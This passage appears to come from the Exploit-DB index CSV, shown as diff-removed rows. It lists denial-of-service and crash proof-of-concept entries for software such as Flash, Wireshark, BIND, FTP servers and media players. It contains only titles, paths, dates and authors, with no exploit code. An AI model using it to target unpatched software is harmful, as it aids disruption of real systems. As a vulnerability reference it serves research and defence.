2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos, -35637,exploits/android/dos/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,dos, -35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos, -35654,exploits/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos, -35725,exploits/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos, -35738,exploits/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",linux,dos, -35753,exploits/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service",2011-05-16,Knud,multiple,dos, -35771,exploits/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)",2015-01-13,"rpaleari & joystick",osx,dos, -35772,exploits/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)",2015-01-13,"rpaleari & joystick",osx,dos, -35773,exploits/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)",2015-01-13,"rpaleari & joystick",osx,dos, -35774,exploits/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)",2015-01-13,"rpaleari & joystick",osx,dos, -35804,exploits/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos, -35820,exploits/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos, -35827,exploits/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos, -35828,exploits/windows/dos/35828.py,"Winamp 5.666 build 3516 - Corrupted .flv Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos, -35842,exploits/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos, -35849,exploits/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos, -35856,exploits/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,multiple,dos, -35859,exploits/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash (PoC)",2015-01-21,"Kaczinski Ramirez",hardware,dos, -35869,exploits/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos, -35870,exploits/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith",windows,dos, -35873,exploits/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service",2011-06-17,rouli,windows,dos, -35876,exploits/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos, -35889,exploits/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",windows,dos, -35895,exploits/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos, -35913,exploits/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos, -35935,exploits/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos, -35938,exploits/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos, -35939,exploits/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos, -35951,exploits/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos, -35957,exploits/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos, -36007,exploits/multiple/dos/36007.txt,"AzeoTech DaqFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos, -36022,exploits/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)",2015-02-09,"Samandeep Singh",windows,dos, -36024,exploits/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption",2015-02-08,"Pablo González",linux,dos, -36037,exploits/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos, -36070,exploits/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos, -36071,exploits/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,windows,dos, -36092,exploits/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,windows,dos, -36128,exploits/windows/dos/36128.txt,"Wireshark 1.6.1 - Malformed Packet Trace File Remote Denial of Service",2011-09-08,Wireshark,windows,dos, -36152,exploits/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",windows,dos, -36158,exploits/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos, -36190,exploits/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",linux,dos, -36198,exploits/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos, -36211,exploits/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial of Service",2011-04-11,"Luigi Auriemma",windows,dos, -36234,exploits/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos, -36247,exploits/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos, -36260,exploits/windows/dos/36260.txt,"Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos, -36266,exploits/lin_x86-64/dos/36266.c,"Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash (PoC)",2015-03-04,"Emeric Nasi",lin_x86-64,dos, -36267,exploits/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos, -36268,exploits/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos, -36271,exploits/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos, -36285,exploits/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)",2011-11-08,anonymous,windows,dos, -36288,exploits/multiple/dos/36288.php,"Libc - 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos, -36300,exploits/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos, -36309,exploits/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos, -36334,exploits/windows/dos/36334.txt,"Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption",2015-03-11,"Francis Provencher",windows,dos, -36335,exploits/windows/dos/36335.txt,"Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption",2015-03-11,"Francis Provencher",windows,dos, -36336,exploits/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos, -36361,exploits/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos, -36377,exploits/multiple/dos/36377.txt,"CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos, -36378,exploits/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos, -36405,exploits/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos, -36388,exploits/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos, -36392,exploits/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling",2015-03-14,"Glafkos Charalambous",windows,dos, -36403,exploits/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos, -36404,exploits/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos, -36783,exploits/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)",2015-04-17,sajith,windows,dos, -36422,exploits/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 -36425,exploits/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos, -36427,exploits/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos, -36431,exploits/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - '.tga' Crash (PoC)",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos, -36433,exploits/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos, -36443,exploits/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Denial of Service / Multiple Vulnerabilities",2011-12-12,anonymous,windows,dos, -40453,exploits/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 -36545,exploits/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos, -36570,exploits/multiple/dos/36570.txt,"Rockwell Automation FactoryTalk Activation Server - Multiple Denial of Service Vulnerabilities",2012-01-17,"Luigi Auriemma",multiple,dos, -36622,exploits/windows/dos/36622.pl,"UltraPlayer 2.112 - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos, -36633,exploits/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos, -36662,exploits/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos, -36669,exploits/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos, -36682,exploits/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos, -36741,exploits/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos, -36743,exploits/linux/dos/36743.c,"Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos, -36773,exploits/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)",2015-04-15,rhcp011235,windows,dos, -36776,exploits/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 -36788,exploits/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos, -36789,exploits/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos, -36799,exploits/bsd/dos/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)",2015-04-21,nitr0us,bsd,dos, -36814,exploits/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos, -36825,exploits/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 -36840,exploits/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos, -36841,exploits/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos, -36847,exploits/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",windows,dos, -36868,exploits/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos, -36869,exploits/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos, -36881,exploits/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos, -36896,exploits/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos, -36903,exploits/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos, -36906,exploits/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)",2015-05-04,beford,linux,dos, -36969,exploits/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos, -36972,exploits/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos, -37014,exploits/windows/dos/37014.py,"iFTP 2.21 - Buffer Overflow Crash (PoC)",2015-05-14,"dogo h@ck",windows,dos, -37036,exploits/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos, -37051,exploits/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",linux,dos, -37053,exploits/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos, -37061,exploits/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos, -37068,exploits/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos, -37124,exploits/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - 'Registration ID' Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos, -37149,exploits/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,windows,dos,22 -37160,exploits/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service",2012-05-14,demonalex,windows,dos, -37187,exploits/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21 -37188,exploits/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos, -37199,exploits/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos, -37218,exploits/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos, -37239,exploits/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash (PoC) (2)",2015-06-08,"Pawel Wylecial",windows,dos, -37249,exploits/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos, -37299,exploits/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos, -37300,exploits/windows/dos/37300.py,"FinePlayer 2.20 - '.mp4' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos, -37306,exploits/linux/dos/37306.txt,"Mosh - Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos, -37267,exploits/windows/dos/37267.py,"foobar2000 1.3.8 - '.m3u' Local Crash (PoC)",2015-06-12,0neb1n,windows,dos, -37268,exploits/windows/dos/37268.py,"GoldWave 6.1.2 - Local Crash (PoC)",2015-06-12,0neb1n,windows,dos, -41889,exploits/windows/dos/41889.rb,"WinSCP 5.9.4 - 'LIST' Denial of Service (Metasploit)",2017-04-16,"mohammed Mohammed",windows,dos, -37286,exploits/windows/dos/37286.py,"FileZilla 3.11.0.2 SFTP Module - Denial of Service",2015-06-15,3unnym00n,windows,dos, -37287,exploits/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client Denial of Service (PoC)",2015-06-15,LiquidWorm,windows,dos, -37291,exploits/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos, -37561,exploits/multiple/dos/37561.pl,"UPNPD M-SEARCH - ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 -37326,exploits/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos, -37327,exploits/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos, -37343,exploits/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,windows,dos, -37346,exploits/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service)",2015-06-23,"Francis Provencher",windows,dos, -37347,exploits/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos, -37348,exploits/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos, -37386,exploits/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos, -37566,exploits/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos, -37456,exploits/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - Firefox Use-After-Free (PoC)",2015-07-01,"Marcin Ressel",windows,dos, -37458,exploits/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos, -37462,exploits/windows/dos/37462.pl,"VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos, -37463,exploits/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos, -37471,exploits/windows/dos/37471.pl,"Zoom Player - '.avi' Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos, -37477,exploits/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service",2012-07-03,"Kevin Fenzi",linux,dos, -37478,exploits/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos, -37480,exploits/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos, -37487,exploits/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,multiple,dos, -37546,exploits/linux/dos/37546.pl,"File Roller v3.4.1 - Denial of Service (PoC)",2015-07-09,Arsyntex,linux,dos, -37517,exploits/hardware/dos/37517.pl,"INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 -37518,exploits/multiple/dos/37518.html,"Arora Browser - Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos, -37525,exploits/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 - Service Disabling",2015-07-08,hyp3rlinx,windows,dos, -37526,exploits/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash (PoC)",2015-07-08,Arsyntex,windows,dos, -37538,exploits/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos, -37558,exploits/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos, -37562,exploits/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 -37568,exploits/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos, -37593,exploits/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos, -37607,exploits/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos, -37608,exploits/windows/dos/37608.py,"Internet Download Manager - Find Download Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos, -37612,exploits/windows/dos/37612.py,"ZOC Terminal Emulator 7 - Quick Connection Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos, -37639,exploits/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos, -37640,exploits/windows/dos/37640.pl,"Divx Player 6.8.2 - Denial of Service",2012-08-20,Dark-Puzzle,windows,dos, -37660,exploits/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",ios,dos, -37663,exploits/linux/dos/37663.txt,"TcpDump - rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos, -37669,exploits/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos, -37673,exploits/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos, -37685,exploits/xml/dos/37685.txt,"SquidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos, -37692,exploits/multiple/dos/37692.pl,"aMSN - Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos, -37706,exploits/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos, -37711,exploits/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection Denial of Service",2015-07-28,St0rn,windows,dos, -37717,exploits/windows/dos/37717.pl,"KMPlayer 3.9.x - '.srt' Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",windows,dos, -37718,exploits/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash (PoC)",2015-07-31,"SATHISH ARTHAR",windows,dos, -37719,exploits/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)",2015-07-31,"Hadi Zomorodi Monavar",windows,dos, -37721,exploits/multiple/dos/37721.c,"ISC BIND 9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos, -37723,exploits/multiple/dos/37723.py,"ISC BIND 9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos, -37727,exploits/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash (PoC)",2015-08-07,"Hadi Zomorodi Monavar",windows,dos, -37728,exploits/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,dos, -37747,exploits/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos, -37739,exploits/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 -37741,exploits/osx/dos/37741.txt,"Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos, -37743,exploits/linux/dos/37743.pl,"Brasero - Crash (PoC)",2015-08-08,"Mohammad Reza Espargham",linux,dos, -37759,exploits/linux/dos/37759.py,"NeuroServer 0.7.4 - EEG TCP/IP Transceiver Remote Denial of Service",2015-08-12,nitr0us,linux,dos, -37763,exploits/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service",2015-08-12,Un_N0n,windows,dos, -37764,exploits/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos, -37766,exploits/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos, -37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos, -37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos, -37777,exploits/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos, -37783,exploits/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos, -38001,exploits/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 -37798,exploits/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos, -37810,exploits/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos, -37839,exploits/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos, -37843,exploits/windows/dos/37843.txt,"Flash Player - Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos, -37844,exploits/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos, -37845,exploits/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos, -37846,exploits/windows/dos/37846.txt,"Flash - Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos, -37847,exploits/windows/dos/37847.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (1)",2015-08-19,bilou,windows,dos, -37848,exploits/windows/dos/37848.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos, -37849,exploits/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos, -37850,exploits/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37852,exploits/multiple/dos/37852.txt,"Adobe Flash - 'Setting' Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37853,exploits/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",windows,dos, -37854,exploits/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",windows,dos, -37855,exploits/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos, -37856,exploits/windows/dos/37856.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)",2015-08-19,"Google Security Research",windows,dos, 